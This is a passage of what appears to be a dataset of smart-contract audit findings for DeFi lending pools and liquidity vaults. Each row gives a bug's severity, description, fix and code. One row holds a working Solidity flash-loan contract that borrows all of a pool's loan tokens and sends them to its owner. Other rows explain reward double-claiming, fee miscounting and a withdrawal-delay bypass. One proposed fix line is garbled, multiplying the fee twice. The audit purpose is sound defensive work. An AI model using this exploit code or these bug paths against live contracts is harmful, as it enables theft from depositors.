repaid or a new deposit is done, tracking the mempool and borrowing any new amount of loan tokens available in the pool, until the collateral ratio reaches a value of zero.\\nA clear case with economic incentives to perform this attack would be that the collateral token drops its price at a high rate and borrow all the available loan tokens from the pool, leaving all suppliers without the chance of withdrawing their share.","```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from ""./FlashLoan.sol"";\\nimport { Pool } from ""./../../src/Pool.sol"";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n" +Fee share calculation is incorrect,medium,"Fees are given to the feeRecipient by minting them shares. The current share calculation is incorrect and always mints too many shares the fee recipient, giving them more fees than they should get.\\nThe current equation is incorrect and will give too many shares, which is demonstrated in the example below.\\nExample:\\n```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n\\nCalculate the fee with the current equation:\\n```\\n_accuredFeeShares = fee * _totalSupply / supplied = 2 * 100 / 100 = 2\\n```\\n\\nThis yields 2 shares. Next calculate the value of the new shares:\\n```\\n2 * 110 / 102 = 2.156\\n```\\n\\nThe value of these shares yields a larger than expected fee. Using a revised equation gives the correct amount of fees:\\n```\\n_accuredFeeShares = (_totalSupply * fee) / (_supplied + _interest - fee) = 2 * 100 / (100 + 10 - 2) = 1.852\\n\\n1.852 * 110 / 101.852 = 2\\n```\\n\\nThis new equation yields the proper fee of 2.","Use the modified equation shown above:\\n```\\n uint fee = _interest * _feeMantissa / 1e18;\\n // 13. Calculate the accrued fee shares\\n- _accruedFeeShares = fee * _totalSupply / _supplied; // if supplied is 0, we will have returned at step 7\\n+ _accruedFeeShares = fee * (_totalSupply * fee) / (_supplied + _interest - fee); // if supplied is 0, we will have returned at step 7\\n // 14. Update the total supply\\n _currentTotalSupply += _accruedFeeShares;\\n```\\n","Fee recipient is given more fees than intended, which results in less interest for LPs",```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n +fund loss because calculated Interest would be 0 in getCurrentState() due to division error,medium,"function `getCurrentState()` Gets the current state of pool variables based on the current time and other functions use it to update the contract state. it calculates interest accrued for debt from the last timestamp but because of the division error in some cases the calculated interest would be 0 and it would cause borrowers to pay no interest.\\nThis is part of `getCurrentState()` code that calculates interest:\\n```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n\\ncode should support all the ERC20 tokens and those tokens may have different decimals. also different pools may have different values for MIN_RATE, SURGE_RATE, MAX_RATE. imagine this scenario:\\ndebt token is USDC and has 6 digit decimals.\\nMIN_RATE is 5% (2 * 1e16) and MAX_RATE is 10% (1e17) and in current state borrow rate is 5% (5 * 1e16)\\ntimeDelta is 2 second. (two seconds passed from last accrue interest time)\\ntotalDebt is 100M USDC (100 * 1e16).\\neach year has about 31M seconds (31 * 1e6).\\nnow code would calculate interest as: `_totalDebt * _borrowRate * _timeDelta / (365 days * 1e18) = 100 * 1e6 * 5 * 1e16 * 2 / (31 * 1e16 * 1e18) = 5 * 2 / 31 = 0`.\\nso code would calculate 0 interest in each interactions and borrowers would pay 0 interest. the debt decimal and interest rate may be different for pools and code should support all of them.",don't update contract state(lastAccrueInterestTime) when calculated interest is 0. add more decimal to total debt and save it with extra 1e18 decimals and transferring or receiving debt token convert the token amount to more decimal format or from it.,borrowers won't pay any interest and lenders would lose funds.,"```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n" +"cachedUserRewards variable is never reset, so user can steal all rewards",high,"cachedUserRewards variable is never reset, so user can steal all rewards\\nWhen user wants to withdraw then `_withdrawUpdateRewardState` function is called. This function updates internal reward state and claims rewards for user if he provided `true` as `claim_` param.\\n```\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff -\\n userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n```\\n\\nWhen user calls claimRewards, then `cachedUserRewards` variable is added to the rewards he should receive. The problem is that `cachedUserRewards` variable is never reset to 0, once user claimed that amount.\\nBecause of that he can claim multiple times in order to receive all balance of token.","Once user received rewards, reset `cachedUserRewards` variable to 0. This can be done inside `_claimInternalRewards` function.",User can steal all rewards,```\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff -\\n userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n```\\n +User can receive more rewards through a mistake in the withdrawal logic,high,"In the `withdraw()` function of the SingleSidedLiquidityVault the contract updates the reward state. Because of a mistake in the calculation, the user is assigned more rewards than they're supposed to.\\nWhen a user withdraws their funds, the `_withdrawUpdateRewardState()` function checks how many rewards those LP shares generated. If that amount is higher than the actual amount of reward tokens that the user claimed, the difference between those values is cached and the amount the user claimed is set to 0. That way they receive the remaining shares the next time they claim.\\nBut, the contract resets the number of reward tokens the user claimed before it computes the difference. That way, the full amount of reward tokens the LP shares generated are added to the cache.\\nHere's an example:\\nAlice deposits funds and receives 1e18 shares\\nAlice receives 1e17 rewards and claims those funds immediately\\nTime passes and Alice earns 5e17 more reward tokens\\nInstead of claiming those tokens, Alice withdraws 5e17 (50% of her shares) That executes `_withdrawUpdateRewardState()` with `lpAmount_ = 5e17` and claim = false:\\n```\\n function _withdrawUpdateRewardState(uint256 lpAmount_, bool claim_) internal {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n // Handles accounting logic for internal and external rewards, harvests external rewards\\n uint256[] memory accumulatedInternalRewards = _accumulateInternalRewards();\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numInternalRewardTokens;) {\\n _updateInternalRewardState(i, accumulatedInternalRewards[i]);\\n if (claim_) _claimInternalRewards(i);\\n\\n // Update reward debts so as to not understate the amount of rewards owed to the user, and push\\n // any unclaimed rewards to the user's reward debt so that they can be claimed later\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n // @audit In our example, rewardDebtDiff = 3e17 (total rewards are 6e17 so 50% of shares earned 50% of reward tokens)\\n uint256 rewardDebtDiff = lpAmount_ * rewardToken.accumulatedRewardsPerShare;\\n\\n // @audit 3e17 > 1e17\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n\\n // @audit userRewardDebts is set to 0 (original value was 1e17, the number of tokens that were already claimed)\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n // @audit cached amount = 3e17 - 0 = 3e17.\\n // Alice is assigned 3e17 reward tokens to be distributed the next time they claim\\n // The remaining 3e17 LP shares are worth another 3e17 reward tokens.\\n // Alice already claimed 1e17 before the withdrawal.\\n // Thus, Alice receives 7e17 reward tokens instead of 6e17\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff - userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n",First calculate `cachedUserRewards` then reset `userRewardDebts`.,A user can receive more reward tokens than they should by abusing the withdrawal system.,"```\\n function _withdrawUpdateRewardState(uint256 lpAmount_, bool claim_) internal {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n // Handles accounting logic for internal and external rewards, harvests external rewards\\n uint256[] memory accumulatedInternalRewards = _accumulateInternalRewards();\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numInternalRewardTokens;) {\\n _updateInternalRewardState(i, accumulatedInternalRewards[i]);\\n if (claim_) _claimInternalRewards(i);\\n\\n // Update reward debts so as to not understate the amount of rewards owed to the user, and push\\n // any unclaimed rewards to the user's reward debt so that they can be claimed later\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n // @audit In our example, rewardDebtDiff = 3e17 (total rewards are 6e17 so 50% of shares earned 50% of reward tokens)\\n uint256 rewardDebtDiff = lpAmount_ * rewardToken.accumulatedRewardsPerShare;\\n\\n // @audit 3e17 > 1e17\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n\\n // @audit userRewardDebts is set to 0 (original value was 1e17, the number of tokens that were already claimed)\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n // @audit cached amount = 3e17 - 0 = 3e17.\\n // Alice is assigned 3e17 reward tokens to be distributed the next time they claim\\n // The remaining 3e17 LP shares are worth another 3e17 reward tokens.\\n // Alice already claimed 1e17 before the withdrawal.\\n // Thus, Alice receives 7e17 reward tokens instead of 6e17\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff - userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n" +Vault can experience long downtime periods,medium,"The chainlink price could stay up to 24 hours (heartbeat period) outside the boundaries defined by `THRESHOLD` but within the chainlink deviation threshold. Deposits and withdrawals will not be possible during this period of time.\\nThe `_isPoolSafe()` function checks if the balancer pool spot price is within the boundaries defined by `THRESHOLD` respect to the last fetched chainlink price.\\nSince in `_valueCollateral()` the `updateThreshold` should be 24 hours (as in the tests), then the OHM derived oracle price could stay at up to 2% from the on-chain trusted price. The value is 2% because in WstethLiquidityVault.sol#L223:\\n```\\nreturn (amount_ * stethPerWsteth * stethUsd * decimalAdjustment) / (ohmEth * ethUsd * 1e18);\\n```\\n\\n`stethPerWsteth` is mostly stable and changes in `stethUsd` and `ethUsd` will cancel out, so the return value changes will be close to changes in `ohmEth`, so up to 2% from the on-chain trusted price.\\nIf `THRESHOLD` < 2%, say 1% as in the tests, then the Chainlink price can deviate by more than 1% from the pool spot price and less than 2% from the on-chain trusted price fro up to 24 h. During this period withdrawals and deposits will revert.","Issue Vault can experience long downtime periods\\n`THRESHOLD` is not fixed and can be changed by the admin, meaning that it can take different values over time.Only a tight range of values around 2% should be allowed to avoid the scenario above.",Withdrawals and deposits can be often unavailable for several hours.,```\\nreturn (amount_ * stethPerWsteth * stethUsd * decimalAdjustment) / (ohmEth * ethUsd * 1e18);\\n```\\n +"SingleSidedLiquidityVault.withdraw will decreases ohmMinted, which will make the calculation involving ohmMinted incorrect",medium,"SingleSidedLiquidityVault.withdraw will decreases ohmMinted, which will make the calculation involving ohmMinted incorrect.\\nIn SingleSidedLiquidityVault, ohmMinted indicates the number of ohm minted in the contract, and ohmRemoved indicates the number of ohm burned in the contract. So the contract just needs to increase ohmMinted in deposit() and increase ohmRemoved in withdraw(). But withdraw() decreases ohmMinted, which makes the calculation involving ohmMinted incorrect.\\n```\\n ohmMinted -= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? ohmReceived - ohmMinted : 0;\\n```\\n\\nConsider that a user minted 100 ohm in deposit() and immediately burned 100 ohm in withdraw().\\nIn _canDeposit, the amount_ is less than LIMIT + 1000 instead of LIMIT\\n```\\n function _canDeposit(uint256 amount_) internal view virtual returns (bool) {\\n if (amount_ + ohmMinted > LIMIT + ohmRemoved) revert LiquidityVault_LimitViolation();\\n return true;\\n }\\n```\\n\\ngetOhmEmissions() returns 1000 instead of 0\\n```\\n function getOhmEmissions() external view returns (uint256 emitted, uint256 removed) {\\n uint256 currentPoolOhmShare = _getPoolOhmShare();\\n\\n if (ohmMinted > currentPoolOhmShare + ohmRemoved)\\n emitted = ohmMinted - currentPoolOhmShare - ohmRemoved;\\n else removed = currentPoolOhmShare + ohmRemoved - ohmMinted;\\n }\\n```\\n","Issue SingleSidedLiquidityVault.withdraw will decreases ohmMinted, which will make the calculation involving ohmMinted incorrect\\n```\\n function withdraw(\\n uint256 lpAmount_,\\n uint256[] calldata minTokenAmounts_,\\n bool claim_\\n ) external onlyWhileActive nonReentrant returns (uint256) {\\n // Liquidity vaults should always be built around a two token pool so we can assume\\n // the array will always have two elements\\n if (lpAmount_ == 0 || minTokenAmounts_[0] == 0 || minTokenAmounts_[1] == 0)\\n revert LiquidityVault_InvalidParams();\\n if (!_isPoolSafe()) revert LiquidityVault_PoolImbalanced();\\n\\n _withdrawUpdateRewardState(lpAmount_, claim_);\\n\\n totalLP // Remove the line below\\n= lpAmount_;\\n lpPositions[msg.sender] // Remove the line below\\n= lpAmount_;\\n\\n // Withdraw OHM and pairToken from LP\\n (uint256 ohmReceived, uint256 pairTokenReceived) = _withdraw(lpAmount_, minTokenAmounts_);\\n\\n // Reduce deposit values\\n uint256 userDeposit = pairTokenDeposits[msg.sender];\\n pairTokenDeposits[msg.sender] // Remove the line below\\n= pairTokenReceived > userDeposit\\n ? userDeposit\\n : pairTokenReceived;\\n// Remove the line below\\n ohmMinted // Remove the line below\\n= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? ohmReceived // Remove the line below\\n ohmMinted : 0;\\n```\\n",It will make the calculation involving ohmMinted incorrect.,```\\n ohmMinted -= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? ohmReceived - ohmMinted : 0;\\n```\\n +SingleSidedLiquidityVault._accumulateInternalRewards will revert with underflow error if rewardToken.lastRewardTime is bigger than current time,medium,"SingleSidedLiquidityVault._accumulateInternalRewards will revert with underflow error if rewardToken.lastRewardTime is bigger than current time\\n```\\n function _accumulateInternalRewards() internal view returns (uint256[] memory) {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256[] memory accumulatedInternalRewards = new uint256[](numInternalRewardTokens);\\n\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n\\n\\n uint256 totalRewards;\\n if (totalLP > 0) {\\n uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime;\\n totalRewards = (timeDiff * rewardToken.rewardsPerSecond);\\n }\\n\\n\\n accumulatedInternalRewards[i] = totalRewards;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return accumulatedInternalRewards;\\n }\\n```\\n\\nThe line is needed to see is this `uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime`. In case if `rewardToken.lastRewardTime > block.timestamp` than function will revert and ddos functions that use it.\\n```\\n function addInternalRewardToken(\\n address token_,\\n uint256 rewardsPerSecond_,\\n uint256 startTimestamp_\\n ) external onlyRole(""liquidityvault_admin"") {\\n InternalRewardToken memory newInternalRewardToken = InternalRewardToken({\\n token: token_,\\n decimalsAdjustment: 10**ERC20(token_).decimals(),\\n rewardsPerSecond: rewardsPerSecond_,\\n lastRewardTime: block.timestamp > startTimestamp_ ? block.timestamp : startTimestamp_,\\n accumulatedRewardsPerShare: 0\\n });\\n\\n\\n internalRewardTokens.push(newInternalRewardToken);\\n }\\n```\\n\\nIn case if `startTimestamp_` is in the future, then it will be set and cause that problem. lastRewardTime: block.timestamp > `startTimestamp_` ? block.timestamp : `startTimestamp_`.\\nNow till, `startTimestamp_` time, `_accumulateInternalRewards` will not work, so vault will be stopped. And of course, admin can remove that token and everything will be fine. That's why i think this is medium.",Skip token if it's `lastRewardTime` is in future.,SingleSidedLiquidityVault will be blocked,```\\n function _accumulateInternalRewards() internal view returns (uint256[] memory) {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256[] memory accumulatedInternalRewards = new uint256[](numInternalRewardTokens);\\n\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n\\n\\n uint256 totalRewards;\\n if (totalLP > 0) {\\n uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime;\\n totalRewards = (timeDiff * rewardToken.rewardsPerSecond);\\n }\\n\\n\\n accumulatedInternalRewards[i] = totalRewards;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return accumulatedInternalRewards;\\n }\\n```\\n +claimFees may cause some external rewards to be locked in the contract,medium,"claimFees will update rewardToken.lastBalance so that if there are unaccrued reward tokens in the contract, users will not be able to claim them.\\n_accumulateExternalRewards takes the difference between the contract's reward token balance and lastBalance as the reward. and the accumulated reward tokens are updated by _updateExternalRewardState.\\n```\\n function _accumulateExternalRewards() internal override returns (uint256[] memory) {\\n uint256 numExternalRewards = externalRewardTokens.length;\\n\\n auraPool.rewardsPool.getReward(address(this), true);\\n\\n uint256[] memory rewards = new uint256[](numExternalRewards);\\n for (uint256 i; i < numExternalRewards; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 newBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n // This shouldn't happen but adding a sanity check in case\\n if (newBalance < rewardToken.lastBalance) {\\n emit LiquidityVault_ExternalAccumulationError(rewardToken.token);\\n continue;\\n }\\n\\n rewards[i] = newBalance - rewardToken.lastBalance;\\n rewardToken.lastBalance = newBalance;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n return rewards;\\n }\\n// rest of code\\n function _updateExternalRewardState(uint256 id_, uint256 amountAccumulated_) internal {\\n // This correctly uses 1e18 because the LP tokens of all major DEXs have 18 decimals\\n if (totalLP != 0)\\n externalRewardTokens[id_].accumulatedRewardsPerShare +=\\n (amountAccumulated_ * 1e18) /\\n totalLP;\\n }\\n```\\n\\nauraPool.rewardsPool.getReward can be called by anyone to send the reward tokens to the contract\\n```\\n function getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n }\\n```\\n\\nHowever, in claimFees, the rewardToken.lastBalance will be updated to the current contract balance after the admin has claimed the fees.\\n```\\n function claimFees() external onlyRole(""liquidityvault_admin"") {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n address rewardToken = internalRewardTokens[i].token;\\n uint256 feeToSend = accumulatedFees[rewardToken];\\n\\n accumulatedFees[rewardToken] = 0;\\n\\n ERC20(rewardToken).safeTransfer(msg.sender, feeToSend);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n for (uint256 i; i < numExternalRewardTokens; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 feeToSend = accumulatedFees[rewardToken.token];\\n\\n accumulatedFees[rewardToken.token] = 0;\\n\\n ERC20(rewardToken.token).safeTransfer(msg.sender, feeToSend);\\n rewardToken.lastBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nConsider the following scenario.\\nStart with rewardToken.lastBalance = 200.\\nAfter some time, the rewardToken in aura is increased by 100.\\nSomeone calls getReward to claim the reward tokens to the contract, and the 100 reward tokens increased have not yet been accumulated via _accumulateExternalRewards and _updateExternalRewardState.\\nThe admin calls claimFees to update rewardToken.lastBalance to 290(10 as fees).\\nUsers call claimRewards and receives 0 reward tokens. 90 reward tokens will be locked in the contract","Use _accumulateExternalRewards and _updateExternalRewardState in claimFees to accrue rewards.\\n```\\n function claimFees() external onlyRole(""liquidityvault_admin"") {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n address rewardToken = internalRewardTokens[i].token;\\n uint256 feeToSend = accumulatedFees[rewardToken];\\n\\n accumulatedFees[rewardToken] = 0;\\n\\n ERC20(rewardToken).safeTransfer(msg.sender, feeToSend);\\n\\n unchecked {\\n // Add the line below\\n// Add the line below\\ni;\\n }\\n }\\n// Add the line below\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numExternalRewardTokens; ) {\\n// Add the line below\\n _updateExternalRewardState(i, accumulatedExternalRewards[i]);\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 feeToSend = accumulatedFees[rewardToken.token];\\n\\n accumulatedFees[rewardToken.token] = 0;\\n\\n ERC20(rewardToken.token).safeTransfer(msg.sender, feeToSend);\\n rewardToken.lastBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n unchecked {\\n // Add the line below\\n// Add the line below\\ni;\\n }\\n }\\n }\\n```\\n",It will cause some external rewards to be locked in the contract,"```\\n function _accumulateExternalRewards() internal override returns (uint256[] memory) {\\n uint256 numExternalRewards = externalRewardTokens.length;\\n\\n auraPool.rewardsPool.getReward(address(this), true);\\n\\n uint256[] memory rewards = new uint256[](numExternalRewards);\\n for (uint256 i; i < numExternalRewards; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 newBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n // This shouldn't happen but adding a sanity check in case\\n if (newBalance < rewardToken.lastBalance) {\\n emit LiquidityVault_ExternalAccumulationError(rewardToken.token);\\n continue;\\n }\\n\\n rewards[i] = newBalance - rewardToken.lastBalance;\\n rewardToken.lastBalance = newBalance;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n return rewards;\\n }\\n// rest of code\\n function _updateExternalRewardState(uint256 id_, uint256 amountAccumulated_) internal {\\n // This correctly uses 1e18 because the LP tokens of all major DEXs have 18 decimals\\n if (totalLP != 0)\\n externalRewardTokens[id_].accumulatedRewardsPerShare +=\\n (amountAccumulated_ * 1e18) /\\n totalLP;\\n }\\n```\\n" +Protection sellers can bypass withdrawal delay mechanism and avoid losing funds when loans are defaulted by creating withdrawal request in each cycle,high,"To prevent protection sellers from withdrawing fund immediately when protected lending pools are defaults, there is withdrawal delay mechanism, but it's possible to bypass it by creating withdraw request in each cycle by doing so user can withdraw in each cycle's open state. there is no penalty for users when they do this or there is no check to avoid this.\\nThis is `_requestWithdrawal()` code:\\n```\\n function _requestWithdrawal(uint256 _sTokenAmount) internal {\\n uint256 _sTokenBalance = balanceOf(msg.sender);\\n if (_sTokenAmount > _sTokenBalance) {\\n revert InsufficientSTokenBalance(msg.sender, _sTokenBalance);\\n }\\n\\n /// Get current cycle index for this pool\\n uint256 _currentCycleIndex = poolCycleManager.getCurrentCycleIndex(\\n address(this)\\n );\\n\\n /// Actual withdrawal is allowed in open period of cycle after next cycle\\n /// For example: if request is made in at some time in cycle 1,\\n /// then withdrawal is allowed in open period of cycle 3\\n uint256 _withdrawalCycleIndex = _currentCycleIndex + 2;\\n\\n WithdrawalCycleDetail storage withdrawalCycle = withdrawalCycleDetails[\\n _withdrawalCycleIndex\\n ];\\n\\n /// Cache existing requested amount for the cycle for the sender\\n uint256 _oldRequestAmount = withdrawalCycle.withdrawalRequests[msg.sender];\\n withdrawalCycle.withdrawalRequests[msg.sender] = _sTokenAmount;\\n\\n unchecked {\\n /// Update total requested withdrawal amount for the cycle considering existing requested amount\\n if (_oldRequestAmount > _sTokenAmount) {\\n withdrawalCycle.totalSTokenRequested -= (_oldRequestAmount -\\n _sTokenAmount);\\n } else {\\n withdrawalCycle.totalSTokenRequested += (_sTokenAmount -\\n _oldRequestAmount);\\n }\\n }\\n\\n emit WithdrawalRequested(msg.sender, _sTokenAmount, _withdrawalCycleIndex);\\n }\\n```\\n\\nAs you can see it doesn't keep track of user current withdrawal requests and user can request withdrawal for all of his balance in each cycle and by doing so user can set `withdrawalCycleDetails[Each Cycle][User]` to user's sToken balance. and whenever user wants to withdraw he only need to wait until the end of the current cycle while he should have waited until next cycle end.","To avoid this code should keep track of user balance that is not in withdraw delay and user balance that are requested for withdraw. and to prevent users from requesting withdrawing and not doing it protocol should have some penalties for withdrawals, for example the waiting withdraw balance shouldn't get reward in waiting duration.",protection sellers can request withdraw in each cycle for their full sToken balance and code would allow them to withdraw in each cycle end time because code doesn't track how much of the balance of users is requested for withdrawals in the past.,"```\\n function _requestWithdrawal(uint256 _sTokenAmount) internal {\\n uint256 _sTokenBalance = balanceOf(msg.sender);\\n if (_sTokenAmount > _sTokenBalance) {\\n revert InsufficientSTokenBalance(msg.sender, _sTokenBalance);\\n }\\n\\n /// Get current cycle index for this pool\\n uint256 _currentCycleIndex = poolCycleManager.getCurrentCycleIndex(\\n address(this)\\n );\\n\\n /// Actual withdrawal is allowed in open period of cycle after next cycle\\n /// For example: if request is made in at some time in cycle 1,\\n /// then withdrawal is allowed in open period of cycle 3\\n uint256 _withdrawalCycleIndex = _currentCycleIndex + 2;\\n\\n WithdrawalCycleDetail storage withdrawalCycle = withdrawalCycleDetails[\\n _withdrawalCycleIndex\\n ];\\n\\n /// Cache existing requested amount for the cycle for the sender\\n uint256 _oldRequestAmount = withdrawalCycle.withdrawalRequests[msg.sender];\\n withdrawalCycle.withdrawalRequests[msg.sender] = _sTokenAmount;\\n\\n unchecked {\\n /// Update total requested withdrawal amount for the cycle considering existing requested amount\\n if (_oldRequestAmount > _sTokenAmount) {\\n withdrawalCycle.totalSTokenRequested -= (_oldRequestAmount -\\n _sTokenAmount);\\n } else {\\n withdrawalCycle.totalSTokenRequested += (_sTokenAmount -\\n _oldRequestAmount);\\n }\\n }\\n\\n emit WithdrawalRequested(msg.sender, _sTokenAmount, _withdrawalCycleIndex);\\n }\\n```\\n" +Lending pool state transition will be broken when pool is expired in late state,high,"Lending pool state transition will be broken 